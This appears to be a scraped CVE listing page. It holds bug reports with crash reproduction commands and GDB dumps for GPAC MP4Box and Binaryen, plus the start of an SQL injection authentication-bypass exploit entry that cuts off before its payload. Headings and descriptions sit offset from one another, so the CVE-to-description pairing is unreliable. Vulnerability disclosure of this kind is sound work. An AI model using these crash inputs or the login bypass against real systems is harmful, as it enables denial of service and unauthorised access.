CVE-2021-45293: Invalid memory address dereference in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) · Issue #4384 · WebAssembly/binaryen

The gf_isom_hint_rtp_read function in GPAC 1.0.1 allows attackers to cause a denial of service (Invalid memory address dereference) via a crafted file in the MP4Box command.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   \[Yes \] I looked for a similar issue and couldn't find any.
*   \[ Yes\] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   \[ Yes\] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Version:**

    ./MP4Box -version
    MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
     MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
     GPAC Filters: https://doi.org/10.1145/3339825.3394929
     GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D 
    

**System information**  
Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)

**command:**

    ./bin/gcc/MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp -bt -out /dev/null poc
    

poc.zip

**Result**

    [9]    3114513 segmentation fault
    

**GDB information**

    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x400788 --> 0x0 
    RCX: 0xcffd67 (<__libc_write+23>:	cmp    rax,0xfffffffffffff000)
    RDX: 0x0 
    RSI: 0x0 
    RDI: 0x10f4580 --> 0x0 
    RBP: 0x7fffffff9340 --> 0x7fffffff9360 --> 0x7fffffff93c0 --> 0x7fffffff9450 --> 0x7fffffff98b0 --> 0x7fffffffe150 (--> ...)
    RSP: 0x7fffffff9300 --> 0x10eb8f0 --> 0x0 
    RIP: 0x60afe1 (<gf_isom_hint_rtp_read+414>:	mov    rax,QWORD PTR [rax+0x8])
    R8 : 0x0 
    R9 : 0x0 
    R10: 0x0 
    R11: 0x246 
    R12: 0xd07990 (<__libc_csu_fini>:	endbr64)
    R13: 0x0 
    R14: 0x10a3018 --> 0xd7e490 (<__memmove_avx_unaligned_erms>:	endbr64)
    R15: 0x0
    EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x60afd5 <gf_isom_hint_rtp_read+402>:	mov    rdi,rax
       0x60afd8 <gf_isom_hint_rtp_read+405>:	call   0x444624 <gf_list_add>
       0x60afdd <gf_isom_hint_rtp_read+410>:	mov    rax,QWORD PTR [rbp-0x18]
    => 0x60afe1 <gf_isom_hint_rtp_read+414>:	mov    rax,QWORD PTR [rax+0x8]
       0x60afe5 <gf_isom_hint_rtp_read+418>:	add    DWORD PTR [rbp-0x28],eax
       0x60afe8 <gf_isom_hint_rtp_read+421>:	mov    eax,DWORD PTR [rbp-0x28]
       0x60afeb <gf_isom_hint_rtp_read+424>:	cmp    eax,DWORD PTR [rbp-0x20]
       0x60afee <gf_isom_hint_rtp_read+427>:	jb     0x60afa2 <gf_isom_hint_rtp_read+351>
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff9300 --> 0x10eb8f0 --> 0x0 
    0008| 0x7fffffff9308 --> 0x10e9510 --> 0xf872747020 
    0016| 0x7fffffff9310 --> 0x1000000010050 
    0024| 0x7fffffff9318 --> 0x4 
    0032| 0x7fffffff9320 --> 0x10001 
    0040| 0x7fffffff9328 --> 0x0 
    0048| 0x7fffffff9330 --> 0x7fffffff9360 --> 0x7fffffff93c0 --> 0x7fffffff9450 --> 0x7fffffff98b0 --> 0x7fffffffe150 (--> ...)
    0056| 0x7fffffff9338 --> 0x5fb0ffd851107300 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x000000000060afe1 in gf_isom_hint_rtp_read (ptr=0x10e9510, bs=0x10eb8f0) at isomedia/hinting.c:682
    682				tempSize += (u32) a->size;
    gdb-peda$ bt
    #0  0x000000000060afe1 in gf_isom_hint_rtp_read (ptr=0x10e9510, bs=0x10eb8f0) at isomedia/hinting.c:682
    #1  0x000000000060a32f in gf_isom_hint_pck_read (ptr=0x10e9510, bs=0x10eb8f0) at isomedia/hinting.c:329
    #2  0x0000000000609f4e in gf_isom_hint_sample_read (ptr=0x10efdc0, bs=0x10eb8f0, sampleSize=0x20) at isomedia/hinting.c:212
    #3  0x000000000058e156 in gf_isom_dump_hint_sample (the_file=0x10dd6c0, trackNumber=0x2, SampleNum=0xf8, trace=0x10e9f30) at isomedia/box_dump.c:2844
    #4  0x0000000000419dc3 in dump_isom_rtp (file=0x10dd6c0, inName=0x7fffffffe602 "/dev/null", is_final_name=GF_TRUE) at filedump.c:860
    #5  0x00000000004156b0 in mp4boxMain (argc=0xb, argv=0x7fffffffe2a8) at main.c:6090
    #6  0x000000000041719b in main (argc=0xb, argv=0x7fffffffe2a8) at main.c:6496
    #7  0x0000000000d07120 in __libc_start_main ()
    #8  0x000000000040211e in _start ()

CVE-2021-45292: A segmentation fault in  gf_isom_hint_rtp_read () , isomedia/hinting.c:682 · Issue #1958 · gpac/gpac

The gf_dump_setup function in GPAC 1.0.1 allows malicoius users to cause a denial of service (Invalid memory address dereference) via a crafted file in the MP4Box command.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   \[Yes \] I looked for a similar issue and couldn't find any.
*   \[ Yes\] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   \[ Yes\] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Version:**

    ./MP4Box -version
    MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    	MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D 
    

**System information**  
Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)

**command:**

    ./bin/gcc/MP4Box -lsr POC
    

POC.zip  
**Result**

    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [ODF] Error reading descriptor (tag 4 size 0): Invalid MPEG-4 Descriptor
    [iso file] Incomplete box mdat - start 11495 size 128
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [ODF] Error reading descriptor (tag 4 size 0): Invalid MPEG-4 Descriptor
    [iso file] Incomplete box mdat - start 11495 size 128
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [MP4 Loading] Unable to fetch sample 1 from track ID 8 - aborting track import
    Scene loaded - dumping 1 systems streams
    [1]    1233733 segmentation fault 
    

**gdb information:**

    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x400788 --> 0x0 
    RCX: 0x0 
    RDX: 0x0 
    RSI: 0x0 
    RDI: 0x10f40f0 --> 0x10f4590 --> 0x10f4460 --> 0x70003 
    RBP: 0x7fffffff87b0 --> 0x7fffffff8850 --> 0x7fffffff9950 --> 0x7fffffffe1f0 --> 0x7fffffffe210 --> 0xd078f0 (<__libc_csu_init>:	endbr64)
    RSP: 0x7fffffff8750 --> 0x10f4090 --> 0x10002 
    RIP: 0x6d9986 (<gf_dump_setup+365>:	movzx  eax,BYTE PTR [rax+0x8])
    R8 : 0xe3d1d3 (" Scene Dump -->\n")
    R9 : 0x12 
    R10: 0xfffffffb 
    R11: 0xe3d1c2 --> 0x565300526553414c ('LASeR')
    R12: 0xd07990 (<__libc_csu_fini>:	endbr64)
    R13: 0x0 
    R14: 0x10a3018 --> 0xd7e490 (<__memmove_avx_unaligned_erms>:	endbr64)
    R15: 0x0
    EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x6d997a <gf_dump_setup+353>:	mov    QWORD PTR [rbp-0x38],rax
       0x6d997e <gf_dump_setup+357>:	mov    rax,QWORD PTR [rbp-0x38]
       0x6d9982 <gf_dump_setup+361>:	mov    rax,QWORD PTR [rax+0x18]
    => 0x6d9986 <gf_dump_setup+365>:	movzx  eax,BYTE PTR [rax+0x8]
       0x6d998a <gf_dump_setup+369>:	cmp    al,0x3
       0x6d998c <gf_dump_setup+371>:	jne    0x6d99ff <gf_dump_setup+486>
       0x6d998e <gf_dump_setup+373>:	mov    rax,QWORD PTR [rbp-0x38]
       0x6d9992 <gf_dump_setup+377>:	mov    rax,QWORD PTR [rax+0x18]
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff8750 --> 0x10f4090 --> 0x10002 
    0008| 0x7fffffff8758 --> 0x10f47d0 --> 0x10e99f0 --> 0x0 
    0016| 0x7fffffff8760 --> 0x500400788 
    0024| 0x7fffffff8768 --> 0x200000000 
    0032| 0x7fffffff8770 --> 0x10f4090 --> 0x10002 
    0040| 0x7fffffff8778 --> 0x10f4460 --> 0x70003 
    0048| 0x7fffffff8780 --> 0x7fffffff87b0 --> 0x7fffffff8850 --> 0x7fffffff9950 --> 0x7fffffffe1f0 --> 0x7fffffffe210 (--> ...)
    0056| 0x7fffffff8788 --> 0x444a92 (<gf_list_enum+61>:	mov    QWORD PTR [rbp-0x8],rax)
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    gf_dump_setup (sdump=0x10f47d0, root_od=0x10f4090) at scene_manager/scene_dump.c:243
    243					if (esd->decoderConfig->streamType != GF_STREAM_SCENE) continue;

CVE-2021-45291: A segmentation fault  in gf_dump_setup() at scene_manager/scene_dump.c:243  · Issue #1955 · gpac/gpac

A Denial of Service vulnerability exits in Binaryen 103 due to an assertion abort in wasm::handle_unreachable.

**Version:**

**System information**  
Ubuntu 20.04.1 LTS, clang version 10.0.0-4ubuntu1

**command:**

POC1.zip

**Result**

**GDB information**

    
    Program received signal SIGABRT, Aborted.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x7ffff6d4afc0 (0x00007ffff6d4afc0)
    RCX: 0x7ffff6d9518b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    RDX: 0x0 
    RSI: 0x7fffffffb640 --> 0x0 
    RDI: 0x2 
    RBP: 0x7fffffffb8b0 --> 0x7fffffffb8c0 --> 0x7fffffffb8e0 --> 0x7fffffffb930 --> 0x7fffffffb9a0 --> 0x7fffffffb9d0 (--> ...)
    RSP: 0x7fffffffb640 --> 0x0 
    RIP: 0x7ffff6d9518b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    R8 : 0x0 
    R9 : 0x7fffffffb640 --> 0x0 
    R10: 0x8 
    R11: 0x246 
    R12: 0x7ffff72ad360 --> 0x7ffff72a73d0 --> 0x7ffff7200400 (<_ZNSoD1Ev>:	endbr64)
    R13: 0x7ffff72ad360 --> 0x7ffff72a73d0 --> 0x7ffff7200400 (<_ZNSoD1Ev>:	endbr64)
    R14: 0x7fffffffccc0 --> 0x555555666f40 --> 0x0 
    R15: 0x555555656610 ("label$28")
    EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff6d9517f <__GI_raise+191>:	mov    edi,0x2
       0x7ffff6d95184 <__GI_raise+196>:	mov    eax,0xe
       0x7ffff6d95189 <__GI_raise+201>:	syscall 
    => 0x7ffff6d9518b <__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108]
       0x7ffff6d95193 <__GI_raise+211>:	xor    rax,QWORD PTR fs:0x28
       0x7ffff6d9519c <__GI_raise+220>:	jne    0x7ffff6d951c4 <__GI_raise+260>
       0x7ffff6d9519e <__GI_raise+222>:	mov    eax,r8d
       0x7ffff6d951a1 <__GI_raise+225>:	add    rsp,0x118
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffb640 --> 0x0 
    0008| 0x7fffffffb648 --> 0x7fffffffca00 --> 0x7fffffffd160 --> 0x0 
    0016| 0x7fffffffb650 --> 0x7fffffffca00 --> 0x7fffffffd160 --> 0x0 
    0024| 0x7fffffffb658 --> 0x7fffffffca00 --> 0x7fffffffd160 --> 0x0 
    0032| 0x7fffffffb660 --> 0x0 
    0040| 0x7fffffffb668 --> 0x55555568bdc0 ("label$53")
    0048| 0x7fffffffb670 --> 0x7fffffffb6f0 --> 0xffffffffffffffff 
    0056| 0x7fffffffb678 --> 0x7ffff7be8775 (<_ZN4wasm17WasmBinaryBuilder13popExpressionEv+85>:	test   al,al)
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGABRT
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff6d74859 in __GI_abort () at abort.c:79
    #2  0x00007ffff7d3ee48 in wasm::handle_unreachable(char const*, char const*, unsigned int) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #3  0x00007ffff7c84557 in wasm::Type::getHeapType() const () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #4  0x00007ffff7bd6a9c in wasm::BrOn::getSentType() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #5  0x00007ffff789c965 in wasm::BranchUtils::operateOnScopeNameUsesAndSentTypes<wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1}>(wasm::Expression*, wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1})::{lambda(wasm::Name&)#1}::operator()(wasm::Name&) const ()
       from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #6  0x00007ffff789ca9d in void wasm::BranchUtils::operateOnScopeNameUses<wasm::BranchUtils::operateOnScopeNameUsesAndSentTypes<wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1}>(wasm::Expression*, wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1})::{lambda(wasm::Name&)#1}>(wasm::Expression*, wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1}) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #7  0x00007ffff789d22c in wasm::Walker<wasm::BranchUtils::BranchSeeker, wasm::UnifiedExpressionVisitor<wasm::BranchUtils::BranchSeeker, void> >::doVisitBrOn(wasm::BranchUtils::BranchSeeker*, wasm::Expression**) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #8  0x00007ffff7a01ef1 in wasm::BranchUtils::BranchSeeker::has(wasm::Expression*, wasm::Name) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #9  0x00007ffff7bd974f in wasm::handleUnreachable(wasm::Block*, wasm::Block::Breakability) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #10 0x00007ffff7c0f923 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #11 0x00007ffff7c11f0d in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #12 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #13 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #14 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #15 0x00007ffff7c11fcd in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #16 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #17 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #18 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #19 0x00007ffff7c11f0d in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #20 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #21 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #22 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #23 0x00007ffff7c11f0d in wasm::WasmBinaryBuilder::visitIf(wasm::If*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #24 0x00007ffff7c0acb2 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #25 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #26 0x00007ffff7c0f012 in wasm::WasmBinaryBuilder::visitBlock(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #27 0x00007ffff7c0b29e in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #28 0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #29 0x00007ffff7c0f840 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #30 0x00007ffff7c1026b in wasm::WasmBinaryBuilder::readFunctions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #31 0x00007ffff7c11802 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #32 0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) ()
       from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #33 0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #34 0x00007ffff7c3e641 in wasm::ModuleReader::read(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #35 0x000055555557e5bb in main ()
    #36 0x00007ffff6d760b3 in __libc_start_main (main=0x55555557cb40 <main>, argc=0x2, argv=0x7fffffffe258, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe248)
        at ../csu/libc-start.c:308
    #37 0x000055555557f97e in _start ()

CVE-2021-45290: An assertion abort in wasm::handle_unreachable(char const*, char const*, unsigned int) ()  · Issue #4383 · WebAssembly/binaryen

A Double Free vulnerability exists in filedump.c in GPAC 1.0.1, which could cause a Denail of Service via a crafted file in the MP4Box command.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   \[Yes \] I looked for a similar issue and couldn't find any.
*   \[ Yes\] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   \[ Yes\] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Version:**

    ./MP4Box -version
    MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    	MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D 
    

**System information**  
Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)

**command:**

POC.zip

**Result**

    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [ODF] Not enough bytes (10) to read descriptor (size=127)
    [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor
    [iso file] Incomplete box mdat - start 11495 size 75
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [ODF] Not enough bytes (10) to read descriptor (size=127)
    [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor
    [iso file] Incomplete box mdat - start 11495 size 75
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [MP4 Loading] Unable to fetch sample 1 from track ID 7 - aborting track import
    free(): double free detected in tcache 2
    [3]    3698317 abort      ./bin/gcc/MP4Box -bt 
    
    

**gdb information:**

    Program received signal SIGABRT, Aborted.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x7ffff5654740 (0x00007ffff5654740)
    RCX: 0x7ffff61d118b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    RDX: 0x0 
    RSI: 0x7fffffff6fd0 --> 0x0 
    RDI: 0x2 
    RBP: 0x7fffffff7320 --> 0x7ffff6376b80 --> 0x0 
    RSP: 0x7fffffff6fd0 --> 0x0 
    RIP: 0x7ffff61d118b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    R8 : 0x0 
    R9 : 0x7fffffff6fd0 --> 0x0 
    R10: 0x8 
    R11: 0x246 
    R12: 0x7fffffff7240 --> 0x0 
    R13: 0x10 
    R14: 0x7ffff7ffb000 --> 0x6565726600001000 
    R15: 0x1
    EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff61d117f <__GI_raise+191>:	mov    edi,0x2
       0x7ffff61d1184 <__GI_raise+196>:	mov    eax,0xe
       0x7ffff61d1189 <__GI_raise+201>:	syscall 
    => 0x7ffff61d118b <__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108]
       0x7ffff61d1193 <__GI_raise+211>:	xor    rax,QWORD PTR fs:0x28
       0x7ffff61d119c <__GI_raise+220>:	jne    0x7ffff61d11c4 <__GI_raise+260>
       0x7ffff61d119e <__GI_raise+222>:	mov    eax,r8d
       0x7ffff61d11a1 <__GI_raise+225>:	add    rsp,0x118
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff6fd0 --> 0x0 
    0008| 0x7fffffff6fd8 --> 0x0 
    0016| 0x7fffffff6fe0 --> 0x7ffff6b0ffca (<Media_GetESD+842>:	mov    rax,QWORD PTR [rsp+0x10])
    0024| 0x7fffffff6fe8 --> 0x0 
    0032| 0x7fffffff6ff0 --> 0x1 
    0040| 0x7fffffff6ff8 --> 0x0 
    0048| 0x7fffffff7000 --> 0x5555556709a0 --> 0x80003 
    0056| 0x7fffffff7008 --> 0x0 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGABRT
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff61b0859 in __GI_abort () at abort.c:79
    #2  0x00007ffff621b3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff6345285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
    #3  0x00007ffff622347c in malloc_printerr (str=str@entry=0x7ffff63475d0 "free(): double free detected in tcache 2") at malloc.c:5347
    #4  0x00007ffff62250ed in _int_free (av=0x7ffff6376b80 <main_arena>, p=0x555555671790, have_lock=0x0) at malloc.c:4201
    #5  0x00007ffff6bf30f5 in gf_odf_del_default () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10
    #6  0x00007ffff6f56654 in gf_sm_load_run_isom () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10
    #7  0x00005555555c3a18 in dump_isom_scene (file=<optimized out>, inName=0x555555644d20 <outfile> "../../result/gpac/afl-outbox-bt-d/crashes/id:000000,sig:06,src:000181,op:havoc,rep:64", is_final_name=GF_FALSE, 
        dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at filedump.c:199
    #8  0x000055555559edd0 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:6044
    #9  0x00007ffff61b20b3 in __libc_start_main (main=0x55555556d540 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308
    #10 0x000055555556d5be in _start () at main.c:6496
    gdb-peda$ 
    '''

CVE-2021-45288: Double Free  in filedump.c:199 · Issue #1956 · gpac/gpac

Online Magazine Management System 1.0 contains a SQL injection authentication bypass vulnerability. The Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form allowing attacker to gain access as admin to the application.

    # Exploit Title: Online Magazine Management System 1.0 -  SQLi Authentication Bypass
    # Date: 01-12-2021
    # Exploit Author: Mohamed habib Smidi (Craniums)
    # Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip
    # Version: 1.0
    # Tested on: Ubuntu
    
    
    # Description :
    
    Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
    
    # Request :
    
    POST /magazines/classes/Login.php?f=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
    Gecko/20100101 Firefox/93.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 49
